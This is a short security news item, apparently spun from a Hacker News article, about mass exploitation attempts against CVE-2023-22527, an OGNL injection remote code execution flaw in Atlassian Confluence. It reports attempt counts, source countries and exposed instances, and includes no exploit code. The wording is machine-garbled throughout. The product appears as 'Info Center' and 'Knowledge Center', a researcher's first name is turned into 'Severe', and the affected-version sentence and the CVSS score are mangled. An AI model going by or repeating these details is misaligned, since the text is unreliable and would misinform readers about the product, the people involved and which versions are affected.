Malicious actors have started to actively exploit a just lately disclosed critical security flaw impacting Atlassian Confluence Info Center and Confluence Server, inside of 3 days of public disclosure.
Tracked as CVE-2023-22527 (CVSS rating: 10.), the vulnerability impacts out-of-date variations of the program, permitting unauthenticated attackers to attain remote code execution on prone installations.
The shortcoming has an effect on Confluence Knowledge Center and Server 8 versions introduced prior to December 5, 2023, as effectively as 8.4.5.
But basically days following the flaw became general public knowledge, virtually 40,000 exploitation tries targeting CVE-2023-22527 have been recorded in the wild as early as January 19 from a lot more than 600 one of a kind IP addresses, in accordance to equally the Shadowserver Basis and the DFIR Report.
The activity is at present restricted “screening callback attempts and ‘whoami’ execution,” suggesting that menace actors are opportunistically scanning for vulnerable servers for follow-on exploitation.
A bulk of the attacker IP addresses are from Russia (22,674), adopted by Singapore, Hong Kong, the U.S., China, India, Brazil, Taiwan, Japan, and Ecuador.
In excess of 11,000 Atlassian instances have been observed to be available about the internet as of January 21, 2024, while it is really now not recognized how several of them are susceptible to CVE-2023-22527.
“CVE-2023-22527 is a critical vulnerability within just Atlassian’s Confluence Server and Data Center,” ProjectDiscovery scientists Rahul Maini and Severe Jaiswal said in a complex evaluation of the flaw.
“This vulnerability has the possible to allow unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and program instructions.”
Discovered this write-up fascinating? Adhere to us on Twitter and LinkedIn to read through much more unique information we article.
Some parts of this article are sourced from:
thehackernews.com